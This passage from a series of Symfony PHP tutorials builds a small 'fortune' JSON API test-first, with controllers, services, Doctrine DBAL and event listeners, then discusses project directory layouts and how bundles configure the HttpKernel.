app.exception_listener:
class: 'AppBundle\EventListener\ExceptionListener'
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException }
Since we changed the configuration, we'll need to clear the cache:
rm -rf var/cache/prod
Finally, we can visit our page again: http://localhost:2501/app.php/.
Let's run our test suite one last time:
rm -rf var/cache/test
vendor/bin/phpunit
Everything is still green!
To create a new page, we need to:
The page's logic is then up to us, it doesn't have to be done in a "Symfony" way. For example we can:
Finally to display the result we need to create a template file and call a templating engine, such as Twig, from our controller.
Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR: Practice makes Better.
In this guide we've explored the main standalone libraries (also known as "Components") provided by Symfony to help us build applications:
We've also seen how HttpKernel enabled reusable code with Bundles, and the different ways to organize our application tree directory.
In this article, we're going to put all this knowledge in practice by creating a "fortune" project with an endpoint that allows us to submit new fortunes.
In the next articles we'll also create for this application:
The first step is to create our project. For this example we'll use the Standard Edition:
composer create-project symfony/framework-standard-edition fortune
This will ask us some configuration questions (e.g. database credentials), allowing us to set up everything in one step.
Note: Nothing prevents us from adding new libraries (e.g. Assert), replacing the ones provided by default (e.g. replacing Doctrine with Pomm) or removing the ones we don't need (e.g. Swiftmailer if we don't need emailing).
To begin with a clean slate we'll need to remove some things:
cd fortune
echo '' >> app/config/routing.yml
rm -rf src/AppBundle/Controller/* tests/AppBundle/Controller/* app/Resources/views/*
Then we're going to install PHPUnit locally:
composer require --dev phpunit/phpunit:5.2 --ignore-platform-reqs
We're now ready to begin.
We'll first start by writing a functional test for our new endpoint:
<?php
// tests/AppBundle/Controller/Api/FortuneControllerTest.php
namespace Tests\AppBundle\Controller\Api;
use Symfony\Component\HttpFoundation\Request;
class FortuneControllerTest extends \PHPUnit_Framework_TestCase
{
private $app;
protected function setUp()
{
$this->app = new \AppKernel('test', false);
}
/**
* @test
*/
public function it_cannot_submit_fortunes_without_content()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
);
$request = Request::create('/api/v1/fortunes', 'POST', array(), array(), array(), $headers, json_encode(array(
)));
$response = $this->app->handle($request);
self::assertSame(422, $response->getStatusCode(), $response->getContent());
}
/**
* @test
*/
public function it_cannot_submit_fortunes_with_non_string_content()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
);
$request = Request::create('/api/v1/fortunes', 'POST', array(), array(), array(), $headers, json_encode(array(
'content' => 42,
)));
$response = $this->app->handle($request);
self::assertSame(422, $response->getStatusCode(), $response->getContent());
}
/**
* @test
*/
public function it_submits_new_fortunes()
{
$headers = array(
'CONTENT_TYPE' => 'application/json',
);
$request = Request::create('/api/v1/fortunes', 'POST', array(), array(), array(), $headers, json_encode(array(
'content' => 'Hello',
)));
$response = $this->app->handle($request);
self::assertSame(201, $response->getStatusCode(), $response->getContent());
}
}
With functional tests, we're only interested in making sure all components play
well together, so checking the response status code (201 for a successful creation,
422 for a validation error) is sufficient.
Note: 400 BAD REQUEST is only used if there's a syntax error in the Request (e.g. invalid JSON).
Let's run the tests:
vendor/bin/phpunit
They fail, with a 404 NOT FOUND response. That's because we don't have any
controllers, so let's fix that:
<?php
// src/AppBundle/Controller/Api/FortuneController.php
namespace AppBundle\Controller\Api;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class FortuneController
{
public function submit(Request $request)
{
return new Response('', 201);
}
}
Having a controller is no good without routing configuration:
# app/config/routing.yml
submit_new_fortunes_endpoint:
path: /api/v1/fortunes
defaults:
_controller: app.api.fortune_controller:submit
methods:
- POST
In this configuration, _controller is set to call the submit method of the
app.api.fortune_controller service. Here's how to define this service:
# app/config/services.yml
services:
app.api.fortune_controller:
class: 'AppBundle\Controller\Api\FortuneController'
Now let's run our tests again:
rm -rf var/cache/test
vendor/bin/phpunit
Note: We need to remove the cache to take into account the new configuration.
The last test (happy scenario) passes! We'll have to fix the first two (unhappy scenarios) later.
We can now call our endpoint directly:
php -S localhost:2501 -t web &
curl -i -X POST localhost:2501/app.php/api/v1/fortunes -H 'Content-Type: application/json' -d '{"content":"Nobody expects the spanish inquisition!"}'
killall -9 php
We should successfully get a 201 CREATED.
So now we have an endpoint that does nothing. Let's fix it by creating the logic. Our first step will be to write a unit test for a class that will do a basic validation of the input:
<?php
// tests/AppBundle/Service/SubmitNewFortuneTest.php
namespace Tests\AppBundle\Service;
use AppBundle\Service\SubmitNewFortune;
class SubmitNewFortuneTest extends \PHPUnit_Framework_TestCase
{
const CONTENT = "Look, matey, I know a dead parrot when I see one, and I'm looking at one right now.";
/**
* @test
*/
public function it_has_a_content()
{
$submitNewFortune = new SubmitNewFortune(self::CONTENT);
self::assertSame(self::CONTENT, $submitNewFortune->content);
}
/**
* @test
*/
public function it_fails_if_the_content_is_missing()
{
$this->expectException(\DomainException::class);
new SubmitNewFortune(null);
}
/**
* @test
*/
public function it_fails_if_the_content_is_not_a_string()
{
$this->expectException(\DomainException::class);
new SubmitNewFortune(42);
}
}
Note: You need PHPUnit 5.2 to be able to use expectException.
Our SubmitNewFortune will check that the submitted content is a string. Let's run
the tests:
vendor/bin/phpunit
Note: If we had used phpspec to write our unit tests, it would have created an empty SubmitNewFortune class for us. There's nothing wrong with using both PHPUnit and phpspec (the first for functional tests and the second for unit tests).
The tests fail because the actual class doesn't exist yet. We need to write it:
<?php
// src/AppBundle/Service/SubmitNewFortune.php
namespace AppBundle\Service;
class SubmitNewFortune
{
public $content;
public function __construct($content)
{
if (null === $content) {
throw new \DomainException('Missing required "content" parameter', 422);
}
if (false === is_string($content)) {
throw new \DomainException('Invalid "content" parameter: it must be a string', 422);
}
$this->content = $content;
}
}
Let's run the tests again:
vendor/bin/phpunit
This time they pass.
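Outside of the test suite, we can also see the validation in action from a quick throwaway script (a sketch: it assumes Composer's autoloader is set up at the usual location):

```php
<?php
// sanity-check.php — throwaway script exercising SubmitNewFortune's validation
require __DIR__.'/vendor/autoload.php';

use AppBundle\Service\SubmitNewFortune;

try {
    new SubmitNewFortune(42);
} catch (\DomainException $e) {
    // The exception code (422) will later be mapped to the HTTP status code
    echo $e->getMessage(); // Invalid "content" parameter: it must be a string
}
```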
Validating the input parameters isn't enough; we now need to execute some logic
to actually submit new fortunes. This can be done in a class that handles SubmitNewFortune:
<?php
// tests/AppBundle/Service/SubmitNewFortuneHandlerTest.php
namespace Tests\AppBundle\Service;
use AppBundle\Service\SaveNewFortune;
use AppBundle\Service\SubmitNewFortune;
use AppBundle\Service\SubmitNewFortuneHandler;
class SubmitNewFortuneHandlerTest extends \PHPUnit_Framework_TestCase
{
const CONTENT = "It's just a flesh wound.";
private $submitNewFortuneHandler;
private $saveNewFortune;
protected function setUp()
{
$this->saveNewFortune = $this->prophesize(SaveNewFortune::class);
$this->submitNewFortuneHandler = new SubmitNewFortuneHandler(
$this->saveNewFortune->reveal()
);
}
/**
* @test
*/
public function it_submits_new_fortunes()
{
$submitNewFortune = new SubmitNewFortune(self::CONTENT);
$this->saveNewFortune->save(array(
'content' => self::CONTENT
))->shouldBeCalled();
$this->submitNewFortuneHandler->handle($submitNewFortune);
}
}
Let's run the tests:
vendor/bin/phpunit
They're telling us to create SubmitNewFortuneHandler:
<?php
// src/AppBundle/Service/SubmitNewFortuneHandler.php
namespace AppBundle\Service;
class SubmitNewFortuneHandler
{
private $saveNewFortune;
public function __construct(SaveNewFortune $saveNewFortune)
{
$this->saveNewFortune = $saveNewFortune;
}
public function handle(SubmitNewFortune $submitNewFortune)
{
$newFortune = array(
'content' => $submitNewFortune->content,
);
$this->saveNewFortune->save($newFortune);
}
}
This should fix this specific error:
vendor/bin/phpunit
Now our tests are telling us to create SaveNewFortune:
<?php
// src/AppBundle/Service/SaveNewFortune.php
namespace AppBundle\Service;
interface SaveNewFortune
{
public function save(array $newFortune);
}
Let's see if it did the trick:
vendor/bin/phpunit
Yes it did! To sum up what we've done in this section:
- a SubmitNewFortune class that contains all input parameters to submit a new fortune, and validates them
- a SubmitNewFortuneHandler class that uses parameters from SubmitNewFortune to call services which will do the actual logic
- a SaveNewFortune interface, whose implementations will save new fortunes
We're going to use Doctrine DBAL to actually save new fortunes in a database.
This can be done by creating an implementation of SaveNewFortune:
<?php
// src/AppBundle/Service/Bridge/DoctrineDbalSaveNewFortune.php
namespace AppBundle\Service\Bridge;
use AppBundle\Service\SaveNewFortune;
use Doctrine\DBAL\Driver\Connection;
class DoctrineDbalSaveNewFortune implements SaveNewFortune
{
private $connection;
public function __construct(Connection $connection)
{
$this->connection = $connection;
}
public function save(array $newFortune)
{
$queryBuilder = $this->connection->createQueryBuilder();
$queryBuilder->insert('fortune');
$queryBuilder->setValue('content', '?');
$queryBuilder->setParameter(0, $newFortune['content']);
$sql = $queryBuilder->getSQL();
$parameters = $queryBuilder->getParameters();
$statement = $this->connection->prepare($sql);
$statement->execute($parameters);
}
}
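For reference, the query builder above ends up producing an ordinary prepared statement; a hand-written equivalent (a sketch, assuming $connection is the same DBAL connection and $newFortune the same array) would be:

```php
<?php
// Hand-written equivalent of what DoctrineDbalSaveNewFortune::save() generates.
$statement = $connection->prepare('INSERT INTO fortune (content) VALUES (?)');
$statement->execute(array($newFortune['content']));
```

Using the query builder instead keeps the SQL generation portable across the database platforms DBAL supports.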
This was the last class we needed to write. We can now use SubmitNewFortune
in our controller:
<?php
// src/AppBundle/Controller/Api/FortuneController.php
namespace AppBundle\Controller\Api;
use AppBundle\Service\SubmitNewFortune;
use AppBundle\Service\SubmitNewFortuneHandler;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class FortuneController
{
private $submitNewFortuneHandler;
public function __construct(SubmitNewFortuneHandler $submitNewFortuneHandler)
{
$this->submitNewFortuneHandler = $submitNewFortuneHandler;
}
public function submit(Request $request)
{
$submitNewFortune = new SubmitNewFortune(
$request->request->get('content')
);
$this->submitNewFortuneHandler->handle($submitNewFortune);
return new Response('', 201);
}
}
Note: In the controller, we extract Request (input) parameters and put them in SubmitNewFortune, which is going to validate them. We then simply call SubmitNewFortuneHandler to take care of the logic associated to SubmitNewFortune.
Now all that's left to do is wire everything together using Dependency Injection:
# app/config/services.yml
services:
app.api.fortune_controller:
class: 'AppBundle\Controller\Api\FortuneController'
arguments:
- '@app.submit_new_fortune_handler'
app.submit_new_fortune_handler:
class: 'AppBundle\Service\SubmitNewFortuneHandler'
arguments:
- '@app.save_new_fortune'
app.save_new_fortune:
alias: app.bridge.doctrine_dbal_save_new_fortune
app.bridge.doctrine_dbal_save_new_fortune:
class: 'AppBundle\Service\Bridge\DoctrineDbalSaveNewFortune'
arguments:
- '@database_connection'
Let's run the tests:
rm -rf var/cache/test
vendor/bin/phpunit
They currently fail with 500 INTERNAL SERVER ERROR. To get an idea of what's
going on, we need to have a look at our logs:
grep CRITICAL var/logs/test.log | tail -n 1 # Get the last line containing "CRITICAL", which is often caused by a 500
This is what we got:
[2016-03-24 19:31:32] request.CRITICAL: Uncaught PHP Exception DomainException: "Missing required "content" parameter" at /home/foobar/fortune/src/AppBundle/Service/SubmitNewFortune.php line 13 {"exception":"[object] (DomainException(code: 422): Missing required \"content\" parameter at /home/foobar/fortune/src/AppBundle/Service/SubmitNewFortune.php:13)"} []
It looks like we don't get any data in the request attribute from Request.
That's because PHP doesn't populate $_POST when we send JSON data. We can fix
it by creating an EventListener that will prepare the Request for us:
<?php
// src/AppBundle/EventListener/JsonRequestContentListener.php
namespace AppBundle\EventListener;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Event\GetResponseEvent;
/**
* PHP does not populate $_POST with the data submitted via a JSON Request,
* causing an empty $request->request.
*
* This listener fixes this.
*/
class JsonRequestContentListener
{
public function onKernelRequest(GetResponseEvent $event)
{
$request = $event->getRequest();
$hasBeenSubmitted = in_array($request->getMethod(), array('PATCH', 'POST', 'PUT'), true);
$isJson = (1 === preg_match('#application/json#', $request->headers->get('Content-Type')));
if (!$hasBeenSubmitted || !$isJson) {
return;
}
$data = json_decode($request->getContent(), true);
if (JSON_ERROR_NONE !== json_last_error()) {
$event->setResponse(new Response('{"error":"Invalid or malformed JSON"}', 400, array('Content-Type' => 'application/json')));

return;
}
$request->request->add($data ?: array());
}
}
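The decoding logic in the listener boils down to plain json_decode and json_last_error calls, which we can check in isolation:

```php
<?php
// Plain-PHP illustration of the decoding done by JsonRequestContentListener.
$data = json_decode('{"content":"Hello"}', true);
var_dump(JSON_ERROR_NONE === json_last_error()); // bool(true)
var_dump($data['content']); // string(5) "Hello"

// Malformed JSON: json_decode returns null and sets an error flag.
json_decode('{invalid', true);
var_dump(JSON_ERROR_NONE === json_last_error()); // bool(false)
```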
Our listener needs to be registered in the Dependency Injection Container:
# app/config/services.yml
services:
app.api.fortune_controller:
class: 'AppBundle\Controller\Api\FortuneController'
arguments:
- '@app.submit_new_fortune_handler'
app.submit_new_fortune_handler:
class: 'AppBundle\Service\SubmitNewFortuneHandler'
arguments:
- '@app.save_new_fortune'
app.save_new_fortune:
alias: app.bridge.doctrine_dbal_save_new_fortune
app.bridge.doctrine_dbal_save_new_fortune:
class: 'AppBundle\Service\Bridge\DoctrineDbalSaveNewFortune'
arguments:
- '@database_connection'
app.json_request_content_listener:
class: 'AppBundle\EventListener\JsonRequestContentListener'
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
This should fix our error:
rm -rf var/cache/test
vendor/bin/phpunit
grep CRITICAL var/logs/test.log | tail -n 1
We still get a 500, but this time for the following reason:
[2016-03-24 19:36:09] request.CRITICAL: Uncaught PHP Exception Doctrine\DBAL\Exception\ConnectionException: "An exception occured in driver: SQLSTATE[08006] [7] FATAL: database "fortune" does not exist" at /home/foobar/fortune/vendor/doctrine/dbal/lib/Doctrine/DBAL/Driver/AbstractPostgreSQLDriver.php line 85 {"exception":"[object] (Doctrine\\DBAL\\Exception\\ConnectionException(code: 0): An exception occured in driver: SQLSTATE[08006] [7] FATAL: database \"fortune\" does not exist at /home/foobar/fortune/vendor/doctrine/dbal/lib/Doctrine/DBAL/Driver/AbstractPostgreSQLDriver.php:85, Doctrine\\DBAL\\Driver\\PDOException(code: 7): SQLSTATE[08006] [7] FATAL: database \"fortune\" does not exist at /home/foobar/fortune/vendor/doctrine/dbal/lib/Doctrine/DBAL/Driver/PDOConnection.php:47, PDOException(code: 7): SQLSTATE[08006] [7] FATAL: database \"fortune\" does not exist at /home/foobar/fortune/vendor/doctrine/dbal/lib/Doctrine/DBAL/Driver/PDOConnection.php:43)"} []
The database doesn't exist. It can be created with the following command, provided by Doctrine:
bin/console doctrine:database:create
Let's take this opportunity to also create the table:
bin/console doctrine:query:sql 'CREATE TABLE fortune (content TEXT);'
Let's re-run the tests:
vendor/bin/phpunit
Hooray! We can now submit new fortunes by calling our endpoint:
rm -rf var/cache/prod
php -S localhost:2501 -t web &
curl -i -X POST localhost:2501/app.php/api/v1/fortunes -H 'Content-Type: application/json' -d '{"content":"What... is the air-speed velocity of an unladen swallow?"}'
killall -9 php
We can see our fortunes in the database:
bin/console doctrine:query:sql 'SELECT * FROM fortune;'
We still have two failing tests though. That's because we don't catch our DomainExceptions.
This can be fixed in an EventListener:
<?php
// src/AppBundle/EventListener/ExceptionListener.php
namespace AppBundle\EventListener;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Event\GetResponseForExceptionEvent;
class ExceptionListener
{
public function onKernelException(GetResponseForExceptionEvent $event)
{
$exception = $event->getException();
if (!$exception instanceof \DomainException) {
return;
}
$event->setResponse(new Response(json_encode(array(
'error' => $exception->getMessage(),
)), $exception->getCode(), array('Content-Type' => 'application/json')));
}
}
It then needs to be registered as a service:
# app/config/services.yml
services:
app.api.fortune_controller:
class: 'AppBundle\Controller\Api\FortuneController'
arguments:
- '@app.submit_new_fortune_handler'
app.submit_new_fortune_handler:
class: 'AppBundle\Service\SubmitNewFortuneHandler'
arguments:
- '@app.save_new_fortune'
app.save_new_fortune:
alias: app.bridge.doctrine_dbal_save_new_fortune
app.bridge.doctrine_dbal_save_new_fortune:
class: 'AppBundle\Service\Bridge\DoctrineDbalSaveNewFortune'
arguments:
- '@database_connection'
app.json_request_content_listener:
class: 'AppBundle\EventListener\JsonRequestContentListener'
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
app.exception_listener:
class: 'AppBundle\EventListener\ExceptionListener'
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException }
Finally we run the tests:
rm -rf var/cache/test
vendor/bin/phpunit
All green!
To create a new endpoint, we need to:
We might need to create some event listeners (to populate $request->request
when receiving JSON content, or to convert exceptions to responses).
The endpoint's logic is then up to us, it doesn't have to be done in a "Symfony" way. For example we can:
You can find the code on Github: Fortune - API example
Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR: Start by putting everything in AppBundle until we have a better
idea of what the project looks like and how to organize it.
In this guide we've explored the main standalone libraries (also known as "Components") provided by Symfony to help us build applications:
We've also seen how HttpKernel enabled reusable code with Bundles.
In this article, we're going to have a closer look at how to organise our applications directory tree.
Finally in the next articles we'll finish by putting all this knowledge in practice by creating a "fortune" project with:
Deciding how our project directory is organized is up to us, but for consistency and convenience we usually use "Editions" to bootstrap new projects:
composer create-project gnugat/symfony-empty-edition our-project
cd our-project
Note: Here we've decided to use the Symfony Empty Edition which follows the "add what you need" philosophy (it only contains the strict minimum).
If we're rather fond of the "solve 80% of use cases" philosophy we can go for Standard Edition which includes many tools commonly used to build full-stack websites.
To find more distributions, check the official website.
The directory tree looks like this:
.
├── app
│ ├── AppKernel.php
│ ├── autoload.php
│ └── config
│ ├── config_dev.yml
│ ├── config_prod.yml
│ ├── config_test.yml
│ ├── config.yml
│ └── parameters.yml.dist
├── bin
│ └── console
├── composer.json
├── src
│ └── AppBundle
│ └── AppBundle.php
├── var
│ ├── cache
│ └── logs
└── web
├── app.php
├── favicon.ico
└── robots.txt
Each folder in the root directory has a purpose:
- app: configuration
- bin: scripts, binaries
- src: our code
- var: temporary files
- web: public directory exposed via the web server (app.php is the front controller)
Note: Classes that wouldn't be used in production can be put outside of src (e.g. tests could be put in tests, fixtures in fixtures, etc). They should be configured in composer.json as follows:
{
    "autoload-dev": {
        "psr-4": {
            "Gnugat\\Toasty\\Fixtures\\": "fixtures",
            "Gnugat\\Toasty\\Tests\\": "tests"
        }
    }
}
This way, when running Composer's install command in development we get our tests/fixtures classes autoloaded, and when running the same command with the --no-dev option in production we don't.
Once we have an empty skeleton, we can start organizing our code by putting all
new classes in src/AppBundle, as advised by the official best practice.
Symfony specific classes can be put in the following directories:
- src/AppBundle/Command, for Console Commands
- src/AppBundle/Controller, for HttpKernel Controllers
- src/AppBundle/DependencyInjection, for CompilerPassInterface and ExtensionInterface implementations
- src/AppBundle/EventListener, for EventDispatcher Listeners
Our project specific classes can be put in the src/AppBundle/Service directory.
The number of classes in it will grow over time; at some point we'll have an itch to organize them in a better way: we can group them by entity.
Regarding configuration, we can organize it this way:
- app/config/routings/ contains Router configuration
- app/config/services/ contains Dependency Injection configuration
The directory tree looks like this:
.
├── app
│ ├── AppKernel.php
│ ├── autoload.php
│ └── config
│ ├── config_dev.yml
│ ├── config_prod.yml
│ ├── config_test.yml
│ ├── config.yml
│ ├── parameters.yml.dist
│ ├── routings
│ └── services
├── bin
│ └── console
├── composer.json
├── composer.lock
├── src
│ └── AppBundle
│ ├── AppBundle.php
│ ├── Command
│ ├── Controller
│ ├── DependencyInjection
│ │ └── CompilerPass
│ ├── EventListener
│ └── Service
├── var
│ ├── cache
│ └── logs
└── web
├── app.php
├── favicon.ico
└── robots.txt
Starting by putting everything in AppBundle is fine until we have a better idea
of what the project looks like and how to organize it.
As suggested in the official best practice,
we can move our "business logic" (everything in src/AppBundle/Service) to a new
src/<vendor>/<project> directory.
Note: Replace
<vendor>by the organization/author (e.g.Gnugat) and<project>by the project name (e.g.Toasty).
The directory tree looks like this:
.
├── app
│ ├── AppKernel.php
│ ├── autoload.php
│ └── config
│ ├── config_dev.yml
│ ├── config_prod.yml
│ ├── config_test.yml
│ ├── config.yml
│ ├── parameters.yml.dist
│ ├── routings
│ └── services
├── bin
│ └── console
├── composer.json
├── composer.lock
├── src
│ ├── AppBundle
│ │ ├── AppBundle.php
│ │ ├── Command
│ │ ├── Controller
│ │ ├── DependencyInjection
│ │ │ └── CompilerPass
│ │ └── EventListener
│ └── <vendor>
│ └── <project>
├── var
│ ├── cache
│ └── logs
└── web
├── app.php
├── favicon.ico
└── robots.txt
By leaving Symfony related classes in src/AppBundle and our "business logic"
in src/<vendor>/<project>, it becomes easier to decouple from the framework.
Building on "decoupling from frameworks", we might also want to decouple from libraries. To do so, our "business logic" classes should rely on interfaces, and their implementations would use libraries.
At this point we can get three different categories of classes:
- Domain ones, classes that reflect our business logic
- Component ones, classes that don't have a direct link to our project and could be reused as libraries
- Bridge ones, classes that map our Domain to Components (or third party libraries)
By organizing our directory tree with those categories, it could look like this:
.
├── app
│ ├── AppKernel.php
│ ├── autoload.php
│ └── config
│ ├── config_dev.yml
│ ├── config_prod.yml
│ ├── config_test.yml
│ ├── config.yml
│ ├── parameters.yml.dist
│ ├── routings
│ └── services
├── bin
│ └── console
├── composer.json
├── composer.lock
├── src
│ ├── AppBundle
│ │ ├── AppBundle.php
│ │ ├── Command
│ │ ├── Controller
│ │ ├── DependencyInjection
│ │ │ └── CompilerPass
│ │ └── EventListener
│ └── <vendor>
│ └── <project>
│ ├── Bridge
│ ├── Component
│ └── Domain
├── var
│ ├── cache
│ └── logs
└── web
├── app.php
├── favicon.ico
└── robots.txt
The issue with the previous organization is that classes in Bridge are now away
from their interfaces. Wouldn't it be better to keep related classes close?
Here's an alternative organization, where we move Bridge to be in Domain:
.
├── app
│ ├── AppKernel.php
│ ├── autoload.php
│ └── config
│ ├── config_dev.yml
│ ├── config_prod.yml
│ ├── config_test.yml
│ ├── config.yml
│ ├── parameters.yml.dist
│ ├── routings
│ └── services
├── bin
│ └── console
├── composer.json
├── composer.lock
├── src
│ ├── AppBundle
│ │ ├── AppBundle.php
│ │ ├── Command
│ │ ├── Controller
│ │ ├── DependencyInjection
│ │ │ └── CompilerPass
│ │ └── EventListener
│ └── <vendor>
│ └── <project>
│ ├── Component
│ └── Domain
│ └── Bridge
├── var
│ ├── cache
│ └── logs
└── web
├── app.php
├── favicon.ico
└── robots.txt
Note: Components could also need their own bridges. Also, a "Bundle" is a kind of bridge: it maps a library to Symfony.
There's a possibility that our application grows out of proportion and we decide it'd be better to split it into smaller applications.
For example if we have an application that creates resources through a backend
and then provides them through an API for other applications, we could split it
in two: backend (note that backend could also be split in two:
backend-api and backend-ui) and api.
The problem is that those two applications would share a lot of logic, so splitting them in different repositories could become cumbersome to maintain. A good indicator to know if they need to be in the same repository: when we create a new version, do we need to release them together?
In that case it might be worth keeping those two applications in the same repository, this practice being called "Monolithic Repository".
For our project, it would mean:
- an apps directory where we would put small Symfony applications, similar to the first directory tree we've seen
- a packages directory where we would put the previous content of src/<vendor>/<project>, with each component in its own directory (to enable us to use them selectively in each app)
Here's an overview:
.
├── apps
│ └── <app>
│ ├── app
│ │ ├── AppKernel.php
│ │ ├── autoload.php
│ │ └── config
│ │ ├── config_dev.yml
│ │ ├── config_prod.yml
│ │ ├── config_test.yml
│ │ ├── config.yml
│ │ ├── parameters.yml.dist
│ │ ├── routings
│ │ └── services
│ ├── bin
│ │ └── console
│ ├── composer.json
│ ├── composer.lock
│ ├── src
│ │ └── AppBundle
│ │ ├── AppBundle.php
│ │ ├── Command
│ │ ├── Controller
│ │ ├── DependencyInjection
│ │ │ └── CompilerPass
│ │ └── EventListener
│ ├── var
│ │ ├── cache
│ │ └── logs
│ └── web
│ ├── app.php
│ ├── favicon.ico
│ └── robots.txt
└── packages
└── <package>
├── composer.json
└── src
Note: More information about Monolithic Repository:
There are many ways to organize our application directory tree, and it's difficult to pick one when we don't have a clear idea of their impact or of what our project should look like.
The best way to tackle this is to first start small (everything in src/AppBundle),
and then gradually move files around. It's also important to make sure that change
is possible.
Here are some alternative ways of organizing the project directory tree:
Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR: Configure services from a third party library in a Bundle.
In this guide we've explored the main standalone libraries (also known as "Components") provided by Symfony to help us build applications:
In this article, we're going to have a closer look at how HttpKernel enables reusable code.
Then in the next article we'll see the different ways to organize our application tree directory.
Finally we'll finish by putting all this knowledge in practice by creating a "fortune" project with:
The HttpKernel component provides two implementations for HttpKernelInterface.
The first one, HttpKernel, relies on Event Dispatcher and Routing to execute
the appropriate controller for the given Request.
And the second one, Kernel, relies on Dependency Injection and HttpKernel:
<?php
namespace Symfony\Component\HttpKernel;
use Symfony\Component\HttpFoundation\Request;
class Kernel implements HttpKernelInterface
{
public function handle(Request $request, $type = HttpKernelInterface::MASTER_REQUEST, $catch = true)
{
if (false === $this->booted) {
$this->boot();
}
return $this->container->get('http_kernel')->handle($request, $type, $catch);
}
public function boot()
{
// Initializes the container
}
abstract public function registerBundles();
}
Note: For brevity's sake, Kernel has been heavily truncated.
Initialization of the container includes:
- the creation of a ContainerBuilder
- the registration of ExtensionInterface implementations in the container
- the registration of CompilerPassInterface implementations in the container
Once the container is initialized, Kernel expects it to contain a http_kernel
service to which it will delegate the actual HTTP work.
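This is exactly what the front controller does in a Symfony application; web/app.php is essentially the following (simplified):

```php
<?php
// web/app.php — the front controller: it turns PHP globals into a Request,
// lets the Kernel handle it, and sends the Response back to the client.
use Symfony\Component\HttpFoundation\Request;

require __DIR__.'/../app/autoload.php';

$kernel = new AppKernel('prod', false);
$request = Request::createFromGlobals();
$response = $kernel->handle($request);
$response->send();
$kernel->terminate($request, $response);
```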
A bundle is a package that contains ExtensionInterface and CompilerPassInterface
implementations, to configure a Dependency Injection container. It can be summed
up by this interface:
<?php
namespace Symfony\Component\HttpKernel\Bundle;
use Symfony\Component\DependencyInjection\ContainerBuilder;
interface BundleInterface
{
// Adds CompilerPassInterface implementations to the container
public function build(ContainerBuilder $container);
// Returns an ExtensionInterface implementation, which will be registered in the container
public function getContainerExtension();
}
Note: Once again, this interface has been truncated for brevity's sake.
Bundles are usually created for one of the following purposes:
Note: the last category is considered bad practice, as explained in the following articles:
- composer require technical-debt-bundle.
- Use only infrastructural bundles in Symfony2, by Elnur Abdurrakhimov
- Should everything really be a bundle in Symfony2?
- Yes, you can have low coupling in a Symfony2 application
- Symfony2 without bundles, by Daniel Ribeiro
- Symfony2 some things I dont like about bundles, by Matthias Noback
- Symfony2 console commands as services why, by Matthias Noback
- Naked bundles, slides by Matthias Noback
Bundles follow by convention the following directory tree:
.
├── Command
├── Controller
├── DependencyInjection
│ └── CompilerPass
├── EventListener
├── Resources
│ └── config
│ └── services
│ └── some_definitions.yml
├── Tests
└── VendorProjectBundle.php
Since the HttpKernel component is a third party library, we're going to create a bundle to provide its classes as Dependency Injection services. This is also a good opportunity to have a look at how a Symfony application works under the hood.
NanoFrameworkBundle's purpose is to provide a http_kernel service that can be
used by Kernel. First let's create a directory:
mkdir nano-framework-bundle
cd nano-framework-bundle
Then we can create an implementation of BundleInterface:
<?php
// VendorNanoFrameworkBundle.php
namespace Vendor\NanoFrameworkBundle;
use Symfony\Component\HttpKernel\Bundle\Bundle;
class VendorNanoFrameworkBundle extends Bundle
{
}
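For the bundle to be taken into account, an application would register it in its kernel. A minimal sketch (AppKernel extends Symfony's Kernel, which requires these two methods):

```php
<?php
// app/AppKernel.php — registering the bundle in an application (sketch)
use Symfony\Component\Config\Loader\LoaderInterface;
use Symfony\Component\HttpKernel\Kernel;

class AppKernel extends Kernel
{
    public function registerBundles()
    {
        return array(
            new Vendor\NanoFrameworkBundle\VendorNanoFrameworkBundle(),
        );
    }

    public function registerContainerConfiguration(LoaderInterface $loader)
    {
        // Loads the application's own configuration files
        $loader->load(__DIR__.'/config/config.yml');
    }
}
```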
To be able to load Dependency Injection configuration, we'll create an
implementation of ExtensionInterface:
<?php
// DependencyInjection/VendorNanoFrameworkExtension.php
namespace Vendor\NanoFrameworkBundle\DependencyInjection;
use Symfony\Component\Config\FileLocator;
use Symfony\Component\Config\Loader\LoaderResolver;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Loader\DirectoryLoader;
use Symfony\Component\DependencyInjection\Loader\YamlFileLoader;
use Symfony\Component\HttpKernel\DependencyInjection\Extension;
class VendorNanoFrameworkExtension extends Extension
{
public function load(array $configs, ContainerBuilder $container)
{
$fileLocator = new FileLocator(__DIR__.'/../Resources/config');
$loader = new DirectoryLoader($container, $fileLocator);
$loader->setResolver(new LoaderResolver(array(
new YamlFileLoader($container, $fileLocator),
$loader,
)));
$loader->load('services/');
}
}
Once done, we can create the configuration:
# Resources/config/services/http_kernel.yml
services:
http_kernel:
class: Symfony\Component\HttpKernel\HttpKernel
arguments:
- "@event_dispatcher"
- "@controller_resolver"
- "@request_stack"
event_dispatcher:
class: Symfony\Component\EventDispatcher\EventDispatcher
controller_resolver:
class: Symfony\Component\HttpKernel\Controller\ControllerResolver
public: false
request_stack:
class: Symfony\Component\HttpFoundation\RequestStack
In order to register event listeners in EventDispatcher in a way that doesn't
require us to edit Resources/config/services/http_kernel.yml, we're going to
create an implementation of CompilerPassInterface:
<?php
// DependencyInjection/CompilerPass/AddListenersPass.php
namespace Vendor\NanoFrameworkBundle\DependencyInjection\CompilerPass;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Compiler\CompilerPassInterface;
use Symfony\Component\DependencyInjection\Reference;
class AddListenersPass implements CompilerPassInterface
{
public function process(ContainerBuilder $container)
{
$eventDispatcher = $container->findDefinition('event_dispatcher');
$eventListeners = $container->findTaggedServiceIds('kernel.event_listener');
foreach ($eventListeners as $id => $events) {
foreach ($events as $event) {
$eventDispatcher->addMethodCall('addListener', array(
$event['event'],
